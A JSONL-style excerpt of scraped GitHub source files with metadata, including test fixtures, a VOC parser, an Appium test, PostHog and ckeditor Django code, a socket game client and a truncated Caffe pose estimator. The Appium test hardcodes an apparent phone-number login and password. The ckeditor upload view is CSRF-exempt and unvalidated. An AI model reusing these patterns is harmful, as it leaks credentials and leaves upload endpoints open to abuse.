GristDocAPI(GRIST_DOC_ID, server=GRIST_SERVER_FROM_LOCAL)\n\n\n@pytest.fixture\ndef assert_grist_table(table_name, grist_api):\n def inner(expected):\n actual = grist_api.fetch_table(table_name)\n\n # Convert namedtuples to dicts\n # Filter out gristHelper_display, which is for reference columns\n actual_asdict = [\n {\n k: v\n for k, v in t._asdict().items()\n if not k.startswith(\"gristHelper_Display\")\n }\n for t in actual\n ]\n\n assert actual_asdict == expected\n\n return inner\n", "repo_name": "johncant/gristfdw", "sub_path": "test/fixtures/integration.py", "file_name": "integration.py", "file_ext": "py", "file_size_in_byte": 3107, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "psycopg2.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "test.defaults.POSTGRES_USER", "line_number": 16, "usage_type": "name"}, {"api_name": "test.defaults.POSTGRES_PASSWORD", "line_number": 16, "usage_type": "name"}, {"api_name": "test.defaults.POSTGRES_HOST", "line_number": 16, "usage_type": "name"}, {"api_name": "test.defaults.POSTGRES_PORT", "line_number": 16, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 11, "usage_type": "attribute"}, {"api_name": "test.defaults.GRIST_API_KEY", "line_number": 38, "usage_type": "name"}, {"api_name": "test.defaults.GRIST_DOC_ID", "line_number": 39, "usage_type": "name"}, {"api_name": "test.defaults.GRIST_SERVER_FROM_POSTGRES", "line_number": 40, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 66, "usage_type": "attribute"}, {"api_name": "test.defaults.GRIST_API_KEY", "line_number": 93, "usage_type": "argument"}, {"api_name": "grist_api.GristDocAPI", "line_number": 94, "usage_type": "call"}, {"api_name": "test.defaults.GRIST_DOC_ID", "line_number": 94, "usage_type": "argument"}, {"api_name": "test.defaults.GRIST_SERVER_FROM_LOCAL", "line_number": 94, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 91, "usage_type": "attribute"}, {"api_name": "grist_api.fetch_table", "line_number": 100, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 97, "usage_type": "attribute"}]}
+{"seq_id": "69973733929", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport xml.etree.ElementTree as ET\n\n\nclasses_name = [\n \"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\",\n \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\",\n \"sheep\", \"sofa\", \"train\",\"tvmonitor\"\n]\n\nclasses_num = {\n 'aeroplane': 0, 'bicycle': 1, 'bird': 2, 'boat': 3, 'bottle': 4,\n 'bus': 5, 'car': 6, 'cat': 7, 'chair': 8, 'cow': 9, 'diningtable': 10,\n 'dog': 11, 'horse': 12, 'motorbike': 13, 'person': 14, 'pottedplant': 15,\n 'sheep': 16, 'sofa': 17, 'train': 18, 'tvmonitor': 19\n}\n\nDATA_ROOT = \"/Volumes/projects/DataSets/VOC\"\nDATA_PATH = os.path.join(DATA_ROOT, \"VOCdevkit/\")\nOUTPUT_PATH = os.path.join(DATA_ROOT, \"pascal_voc_{}.txt\")\n\n\ndef parse_xml(xml_file, year=2007):\n \"\"\"\n Args:\n xml_file: the input xml file path\n\n Returns:\n image_path: string\n labels: list of [xmin, ymin, xmax, ymax, class]\n \"\"\"\n tree = ET.parse(xml_file)\n root = tree.getroot()\n image_path = ''\n labels = []\n\n for item in root:\n if item.tag == 'filename':\n if year == 2007:\n image_path = os.path.join(\n DATA_PATH, 'VOC2007/JPEGImages', item.text)\n if year == 2012:\n image_path = os.path.join(\n DATA_PATH, 'VOC2012/JPEGImages', item.text)\n elif item.tag == 'object':\n obj_name = item[0].text\n obj_num = classes_num[obj_name]\n bndbox = item.find(\"bndbox\")\n xmin = int(float(bndbox.find(\"xmin\").text))\n ymin = int(float(bndbox.find(\"ymin\").text))\n xmax = int(float(bndbox.find(\"xmax\").text))\n ymax = int(float(bndbox.find(\"ymax\").text))\n labels.append([xmin, ymin, xmax, ymax, obj_num])\n\n return image_path, labels\n\n\ndef convert_to_string(image_path, labels):\n out_string = ''\n out_string += image_path\n for label in labels:\n for i in label:\n out_string += ' ' + str(i)\n out_string += '\\n'\n\n return out_string\n\n\ndef run_main(year=2007):\n print(\"Start format voc {} data !\".format(year))\n out_file = open(OUTPUT_PATH.format(year), \"w\")\n if year == 2007:\n xml_dir = os.path.join(DATA_PATH, \"VOC2007/Annotations/\")\n if year == 2012:\n xml_dir = os.path.join(DATA_PATH, \"VOC2012/Annotations/\")\n\n xml_list = os.listdir(xml_dir)\n\n xml_list = [xml_dir + tmp for tmp in xml_list]\n for xml in xml_list:\n if not os.path.isfile(xml):\n print(\"{} not xml file path.\".format(xml))\n image_path, labels = parse_xml(xml, year=year)\n record = convert_to_string(image_path, labels)\n out_file.write(record)\n out_file.close()\n\nif __name__ == '__main__':\n run_main(year=2007)\n run_main(year=2012)\n", "repo_name": "liuguiyangnwpu/DL.EyeSight", "sub_path": "Others/voc/process_pascal_voc.py", "file_name": "process_pascal_voc.py", "file_ext": "py", "file_size_in_byte": 2905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 49, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 37, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 82, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 85, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 86, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 86, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 87, "usage_type": "argument"}, {"api_name": "xml.etree.ElementTree", "line_number": 88, "usage_type": "argument"}]}
+{"seq_id": "18486014884", "text": "from common.desired_cadps import desired_conf\nfrom selenium.common.exceptions import NoSuchElementException\nimport logging\nfrom selenium.webdriver.common.by import By\nimport time\nimport random\nfrom page.login_page import login\n\n\nclass Home_page(login):\n # 首页入口搜索相关元素\n home_button = (By.ID, \"com.tal.kaoyan:id/mainactivity_button_calendar\")\n search_button = (By.ID, \"com.tal.kaoyan:id/imageSearch\")\n Input_button = (By.ID, \"com.tal.kaoyan:id/customsearchview_contentedittext\")\n SouSu_button = (By.XPATH, \"//*[@text='搜索']\")\n\n def Click_Home(self):\n \"\"\"点击首页入口元素\"\"\"\n self.click(self.home_button)\n\n def Click_Search(self):\n \"\"\"点击搜索框\"\"\"\n self.click(self.search_button)\n\n def Input_Search(self, text):\n \"\"\"输入搜索内容\"\"\"\n self.clear(self.Input_button)\n self.sendKeys(self.Input_button, text)\n\n def Click_Sousu(self):\n \"\"\"点击输入内容后的搜素按钮\"\"\"\n self.click(self.SouSu_button)\n\n # 搜索滑动用例流程\n def Search_Shake_Case(self, username, psw, text):\n self.psw_login(username, psw)\n self.Click_Home()\n time.sleep(2)\n logging.info(\"====My youstar_page returns to the search youstar_page====\")\n self.Click_Search()\n self.Input_Search(text)\n logging.info(\"====Enter search content:%s====\" % text)\n self.getScreenShot(text)\n self.Click_Sousu()\n logging.info(\"====Search content succeeded===\")\n self.getScreenShot(\"Search content succeeded\")\n self.Search_swipe()\n self.Check_Search()\n\n # 滑动两次方法封装,后续用例根据自己需求封装\n def Search_swipe(self):\n for i in range(2):\n self.Swipe_left()\n logging.info(\"=====Swipe left:\" + str(i + 1) + \"次=====\")\n time.sleep(2)\n for i in range(2):\n self.Swipe_right()\n logging.info(\"=====Swipe right:\" + str(i + 1) + \"次=====\")\n time.sleep(2)\n self.getScreenShot(\"Swipe right\" + str(i + 1) + \"次\")\n for i in range(2):\n self.Swipe_Up()\n logging.info(\"=====Swipe Up:\" + str(i + 1) + \"次=====\")\n time.sleep(1)\n self.getScreenShot(\"Swipe Up\" + str(i + 1) + \"次\")\n for i in range(2):\n self.Swipe_Down()\n logging.info(\"=====Swipe Down\" + str(i + 1) + \"次=====\")\n time.sleep(1)\n self.getScreenShot(\"Swipe Down\" + str(i + 1) + \"次\")\n\n # 校验头像更换是否跟换成功,做unittest需要校验是否成功\n def Check_Search(self):\n try:\n self.findElement(self.SouSu_button)\n logging.info(\"校验元素成功!:%s\" % str(self.SouSu_button))\n return True\n\n except NoSuchElementException:\n logging.info(\"没有找到校验元素:%s\" % str(self.SouSu_button))\n return False\n\n\nif __name__ == '__main__':\n driver = desired_conf()\n L = Home_page(driver)\n L.Search_Shake_Case(username=\"13632721415\", psw=\"Chuiling@950720\", text=\"心理学\")", "repo_name": "qangcheng/-appium-test", "sub_path": "page/Home_page.py", "file_name": "Home_page.py", "file_ext": "py", "file_size_in_byte": 3136, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "page.login_page.login", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 12, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 12, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 13, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 14, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 14, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 15, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 15, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 54, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 63, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 64, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 68, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 76, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 79, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 80, "usage_type": "call"}, {"api_name": "common.desired_cadps.desired_conf", "line_number": 85, "usage_type": "call"}]}
+{"seq_id": "18071163082", "text": "from msrest.serialization import Model\n\n\nclass AclList(Model):\n \"\"\"A Data Lake Analytics catalog access control list (ACL).\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :ivar value: the access control list (ACL).\n :vartype value: list[~azure.mgmt.datalake.analytics.catalog.models.Acl]\n \"\"\"\n\n _validation = {\n 'value': {'readonly': True},\n }\n\n _attribute_map = {\n 'value': {'key': 'value', 'type': '[Acl]'},\n }\n\n def __init__(self):\n super(AclList, self).__init__()\n self.value = None\n", "repo_name": "AntObr/credit-to-customer", "sub_path": "env/lib/python2.7/site-packages/azure/mgmt/datalake/analytics/catalog/models/acl_list.py", "file_name": "acl_list.py", "file_ext": "py", "file_size_in_byte": 594, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "msrest.serialization.Model", "line_number": 4, "usage_type": "name"}]}
+{"seq_id": "39513327929", "text": "import os\nfrom typing import Any, Callable, List, Optional, Set\n\nfrom django.core.exceptions import ImproperlyConfigured\n\nfrom posthog.utils import str_to_bool\n\n__all__ = [\"get_from_env\", \"get_list\", \"str_to_bool\"]\n\n\ndef get_from_env(\n key: str,\n default: Any = None,\n *,\n optional: bool = False,\n type_cast: Optional[Callable] = None,\n) -> Any:\n value = os.getenv(key)\n if value is None or value == \"\":\n if optional:\n return None\n if default is not None:\n return default\n else:\n raise ImproperlyConfigured(f'The environment variable \"{key}\" is required to run PostHog!')\n if type_cast is not None:\n return type_cast(value)\n return value\n\n\ndef get_list(text: str) -> List[str]:\n if not text:\n return []\n return [item.strip() for item in text.split(\",\")]\n\n\ndef get_set(text: str) -> Set[str]:\n if not text:\n return set()\n return {item.strip() for item in text.split(\",\")}\n", "repo_name": "PostHog/posthog", "sub_path": "posthog/settings/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14422, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Any", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 16, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "django.core.exceptions.ImproperlyConfigured", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "38765849516", "text": "from django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom . import utils\nfrom . import settings as ck_settings\n\n\n@csrf_exempt\ndef upload(request):\n \"\"\"\n Uploads a file and send back its URL to CKEditor.\n\n TODO:\n Validate uploads\n \"\"\"\n # Get the uploaded file from request.\n upload = request.FILES['upload']\n\n # Open output file in which to store upload.\n upload_filename = utils.get_upload_filename(upload.name, request.user)\n out = open(upload_filename, 'wb+')\n\n # Iterate through chunks and write to destination.\n for chunk in upload.chunks():\n out.write(chunk)\n out.close()\n\n url = utils.create_thumbnail(upload_filename)\n\n # Respond with Javascript sending ckeditor upload url.\n return HttpResponse(\"\"\"\n \"\"\" % (request.GET['CKEditorFuncNum'], url))\n\n\ndef browse(request):\n return render_to_response('browse.html', RequestContext(request, {\n 'images': utils.get_image_browse_urls(request.user),\n }))\n\n\ndef configs(request):\n merged_configs = {}\n if ck_settings.CONFIGS is not None:\n for config_name, config in ck_settings.CONFIGS.iteritems():\n merged_configs[config_name] = utils.validate_config(config_name)\n\n return render_to_response('ckeditor/configs.js', RequestContext(request, {\n 'debug': ck_settings.CKEDITOR_DEBUG,\n 'timestamp': ck_settings.TIMESTAMP,\n 'merged_configs': utils.pretty_json_encode(merged_configs),\n 'jquery_override_val': utils.json_encode(ck_settings.JQUERY_OVERRIDE_VAL),\n }), mimetype=\"application/x-javascript\")\n\n\n@csrf_exempt\ndef fb_upload(request):\n \"\"\"\n A wrapper around django-filebrowser's file upload view. It returns a\n javascript function call to CKEDITOR.tools.callFunction(), which\n CKEDITOR expects.\n \"\"\"\n try:\n import filebrowser\n except ImportError:\n raise Exception(\"Filebrowser not installed\")\n\n upload_file_view = None\n\n try:\n from filebrowser.sites import site\n except ImportError:\n pass\n else:\n upload_file_view = site._upload_file\n\n if upload_file_view is None:\n try:\n from filebrowser.views import _upload_file\n except ImportError:\n raise Exception(\n \"django-filebrowser must be version 3.3.0 or greater; \"\n \"currently at version %s\" % filebrowser.VERSION)\n else:\n upload_file_view = _upload_file\n\n # Create a dict on the request object that will be modified by the\n # filebrowser_post_upload signal receiver in ckeditor/models.py\n fb_data = request._fb_data = {}\n\n # Call original view function.\n # Within this function, the filebrowser_post_upload signal will be sent,\n # and our signal receiver will add the filebrowser.base.FileObject\n # instance to request._fb_data[\"upload_file\"]\n upload_file_view(request)\n\n upload_file = fb_data.get('upload_file')\n if not upload_file:\n return HttpResponse(\"Error uploading file\")\n\n return HttpResponse(\"\"\"\n \"\"\" % (request.GET['CKEditorFuncNum'], upload_file.url))\n", "repo_name": "mickael9/django-ckeditor", "sub_path": "ckeditor/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3429, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.http.HttpResponse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 10, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 40, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 40, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 51, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 51, "usage_type": "call"}, {"api_name": "filebrowser.sites.site._upload_file", "line_number": 78, "usage_type": "attribute"}, {"api_name": "filebrowser.sites.site", "line_number": 78, "usage_type": "name"}, {"api_name": "filebrowser.VERSION", "line_number": 86, "usage_type": "attribute"}, {"api_name": "filebrowser.views._upload_file", "line_number": 88, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 102, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 104, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 59, "usage_type": "name"}]}
+{"seq_id": "18028367829", "text": "import threading\r\nimport json\r\nimport socket\r\nimport tkinter as tk\r\nimport config\r\n\r\nip = config.get_ip()\r\n\r\n\r\nclass TicTacToe_client:\r\n def __init__(self, port, name, root):\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.sock.connect((ip, port))\r\n self.sock.send(json.dumps(name).encode('utf-8'))\r\n self.width = 300\r\n self.height = 400\r\n self.btn_list = []\r\n self.root = tk.Toplevel(root)\r\n self.root.geometry(str(self.width) + 'x' + str(self.height))\r\n self.root.title('TicTacToe')\r\n self.root.resizable(False, False)\r\n self.root.protocol(\"WM_DELETE_WINDOW\", self.give_up)\r\n\r\n self.c = tk.Canvas(self.root)\r\n self.c.configure(height=self.height, width=self.width, bg='gray')\r\n self.c.pack()\r\n\r\n def give_up(self):\r\n self.sock.send(json.dumps('**||GIVEUP||**').encode('utf-8'))\r\n self.root.destroy()\r\n\r\n\r\n def draw_empty_board(self):\r\n # Creating a 3x3 table\r\n self.c.create_rectangle(0, 0, 300, 100, fill='black')\r\n self.c.create_text(150, 50, text='TicTacToe', font=('Jokerman', 30), fill='white', tags='text')\r\n for i in range(1, 4):\r\n self.c.create_line(0, 100 + i * 100, self.width, 100 + i * 100)\r\n self.c.create_line(i * 100, 100, i * 100, self.height)\r\n\r\n def val_btn(self, num):\r\n row = num // 3\r\n col = num % 3\r\n self.sock.send(json.dumps((row, col)).encode('utf-8'))\r\n\r\n def create_btns(self):\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(0),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(1),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(2),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(3),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(4),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(5),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(6),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(7),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(8),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n\r\n def drawGame(self, game_grid):\r\n self.c.delete('all')\r\n self.draw_empty_board()\r\n\r\n for row in range(3):\r\n for col in range(3):\r\n if game_grid[row][col] == 0:\r\n self.c.create_window(col * 100 + 50, 150 + row * 100, window=self.btn_list[row * 3 + col])\r\n elif game_grid[row][col] == 1:\r\n self.c.create_oval(col * 100 + 20, 120 + row * 100, 80 + col * 100, 180 + row * 100, width=2)\r\n elif game_grid[row][col] == 2:\r\n self.c.create_line(col * 100, 200 + row * 100, 100 + col * 100, 100 + row * 100, width=2,\r\n fill='black')\r\n self.c.create_line(col * 100, 100 + row * 100, 100 + col * 100, 200 + row * 100, width=2,\r\n fill='black')\r\n\r\n def draw_win_line(self, key):\r\n if key[-3:] == '--0':\r\n self.c.delete('text')\r\n self.c.create_text(150, 50, text='DRAW', font=('chiller', 40), fill='white')\r\n return\r\n key = key[4:]\r\n if key[0] == 'R':\r\n self.c.create_line(0, 150 + int(key[1]) * 100, self.width, 150 + int(key[1]) * 100, fill='red', width=4)\r\n elif key[0] == 'C':\r\n self.c.create_line(50 + int(key[1]) * 100, 100, 50 + int(key[1]) * 100, 400, fill='red', width=4)\r\n elif key[0:2] == 'DL':\r\n self.c.create_line(0, 100, 300, 400, fill='red', width=4)\r\n elif key[0:2] == 'DR':\r\n self.c.create_line(0, 400, 300, 100, fill='red', width=4)\r\n self.c.delete('text')\r\n string = key[2:] + ' Wins'\r\n self.c.create_text(150, 50, text=string, font=('chiller', 30), fill='white')\r\n\r\n def shut_down(self):\r\n self.root.destroy()\r\n\r\n def play_game(self):\r\n while True:\r\n received = False\r\n while not received:\r\n try:\r\n game_board = json.loads(self.sock.recv(4096).decode('utf-8'))\r\n received = True\r\n except json.decoder.JSONDecodeError:\r\n pass\r\n print(game_board)\r\n if game_board == 'move':\r\n self.c.delete('wait')\r\n self.c.create_text(300, 100, text='YOUR TURN', anchor='se', font=('Times New Roman', 12), fill='cyan', tag='move')\r\n for i in range(9):\r\n self.btn_list[i].configure(state='normal')\r\n elif game_board[:4] == 'OVER':\r\n self.c.delete('move')\r\n self.c.delete('wait')\r\n self.root.protocol(\"WM_DELETE_WINDOW\", self.shut_down)\r\n self.draw_win_line(game_board)\r\n break\r\n else:\r\n for i in range(9):\r\n self.btn_list[i].configure(state='disabled')\r\n self.c.delete('move')\r\n self.c.create_text(300, 100, text='WAIT', anchor='se', font=('Times New Roman', 12), fill='red', tag='wait')\r\n self.drawGame(game_board)\r\n\r\n def run(self):\r\n self.draw_empty_board()\r\n self.create_btns()\r\n self.drawGame([[0, 0, 0], [0, 0, 0], [0, 0, 0]])\r\n\r\n play = threading.Thread(target=self.play_game)\r\n play.start()\r\n\r\n # self.root.mainloop()\r\n", "repo_name": "AR-PyT/Gaming-Platform-with-Integrated-Chat", "sub_path": "tictactoe_client.py", "file_name": "tictactoe_client.py", "file_ext": "py", "file_size_in_byte": 6592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.get_ip", "line_number": 7, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 12, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 12, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 12, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}, {"api_name": "tkinter.Toplevel", "line_number": 18, "usage_type": "call"}, {"api_name": "tkinter.Canvas", "line_number": 24, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 29, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 44, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 50, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 53, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 56, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 59, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 62, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 68, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 71, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 117, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 119, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 145, "usage_type": "call"}]}
+{"seq_id": "12224587916", "text": "#!/usr/bin/env python\n\n\"\"\"\npose_cpm.py: Convolutional Pose Machines.\nBased on @shihenw code:\nhttps://github.com/shihenw/convolutional-pose-machines-release/blob/master/testing/python/demo.ipynb\n\"\"\"\n__author__ = \"David Pascual Hernandez\"\n__date__ = \"2017/05/22\"\n\nimport math\nimport os\n\n# Avoids verbosity when loading Caffe model\nos.environ[\"GLOG_minloglevel\"] = \"2\"\n\nimport caffe\nimport cv2\nimport numpy as np\n\nfrom pose import PoseEstimator\n\nfrom matplotlib import pyplot as plt\n\n\ndef crop_human(sample, c, s, bsize):\n \"\"\"\n Crop human in the image depending on subject center and scale.\n @param sample: np.array - input image\n @param c: list - approx. human center\n @param s: float - approx. human scale wrt 200px\n @param bsize: int - boxsize\n @return: np.array - cropped human\n \"\"\"\n cx, cy = c\n\n # Resize image and center according to given scale\n im_resized = cv2.resize(sample, None, fx=s, fy=s)\n\n h, w, d = im_resized.shape\n\n pad_up = int(bsize / 2 - cy)\n pad_down = int(bsize / 2 - (h - cy))\n pad_left = int(bsize / 2 - cx)\n pad_right = int(bsize / 2 - (w - cx))\n\n # Apply padding or crop image as needed\n if pad_up > 0:\n pad = np.ones((pad_up, w, d), np.uint8) * 128\n im_resized = np.vstack((pad, im_resized))\n else:\n im_resized = im_resized[-pad_up:, :, :]\n h, w, d = im_resized.shape\n\n if pad_down > 0:\n pad = np.ones((pad_down, w, d), np.uint8) * 128\n im_resized = np.vstack((im_resized, pad))\n else:\n im_resized = im_resized[:h + pad_down, :, :]\n h, w, d = im_resized.shape\n\n if pad_left > 0:\n pad = np.ones((h, pad_left, d), np.uint8) * 128\n im_resized = np.hstack((pad, im_resized))\n else:\n im_resized = im_resized[:, -pad_left:, :]\n h, w, d = im_resized.shape\n\n if pad_right > 0:\n pad = np.ones((h, pad_right, d), np.uint8) * 128\n im_resized = np.hstack((im_resized, pad))\n else:\n im_resized = im_resized[:, :w + pad_right, :]\n\n return im_resized\n\n\ndef map_resize(new_shape, heatmap):\n # Resizes the output back to the size of the test image\n scale_y = new_shape[0] / float(heatmap.shape[0])\n scale_x = new_shape[1] / float(heatmap.shape[1])\n map_resized = cv2.resize(heatmap, None, fx=scale_x, fy=scale_y,\n interpolation=cv2.INTER_CUBIC)\n\n return map_resized\n\n\nclass PoseCPM(PoseEstimator):\n def __init__(self, model_fname, boxsize, sigma, confidence_th=0.3):\n \"\"\"\n Constructs Estimator class.\n @param model_fname: Caffe models\n @param weights: Caffe models weights\n \"\"\"\n PoseEstimator.__init__(self, model_fname, boxsize, confidence_th)\n self.model, self.weights = self.model_fname\n self.sigma = sigma\n self.gauss_map = self.gen_gaussmap()\n\n def init_net(self):\n caffe.set_mode_gpu()\n self.net = caffe.Net(self.model, self.weights, caffe.TEST)\n\n def estimate(self):\n \"\"\"\n Estimates human pose.\n @param im: np.array - input image\n @param gaussmap: np.array - Gaussian map\n @return: np.array: articulations coordinates\n \"\"\"\n if not self.net:\n self.init_net()\n\n # Adds gaussian map channel to the input\n input_4ch = np.ones((self.im.shape[0], self.im.shape[1], 4))\n input_4ch[:, :, 0:3] = self.im / 256.0 - 0.5 # normalize to [-0.5, 0.5]\n input_4ch[:, :, 3] = self.gauss_map\n\n # Adapts input to the net\n input_adapted = np.transpose(np.float32(input_4ch[:, :, :, np.newaxis]),\n (3, 2, 0, 1))\n self.net.blobs['data'].reshape(*input_adapted.shape)\n self.net.blobs['data'].data[...] = input_adapted\n\n # Estimates the pose\n output_blobs = self.net.forward()\n pose_map = np.squeeze(self.net.blobs[output_blobs.keys()[0]].data)\n\n return pose_map\n\n def gen_gaussmap(self):\n \"\"\"\n Generates a grayscale image with a centered Gaussian\n @param sigma: float - Gaussian sigma\n @return: np.array - Gaussian map\n \"\"\"\n gaussmap = np.zeros((self.boxsize, self.boxsize, 1))\n for x in range(self.boxsize):\n for y in range(self.boxsize):\n dist_sq = (x - self.boxsize / 2) * (x - self.boxsize / 2) \\\n + (y - self.boxsize / 2) * (y - self.boxsize / 2)\n exponent = dist_sq / 2.0 / self.sigma / self.sigma\n gaussmap[y, x, :] = math.exp(-exponent)\n\n return np.squeeze(gaussmap)\n\n def get_coords(self, sample, human_bbox, get_pose_maps=False):\n \"\"\"\n Estimate human pose given an input image.\n @param sample: np.array - original input 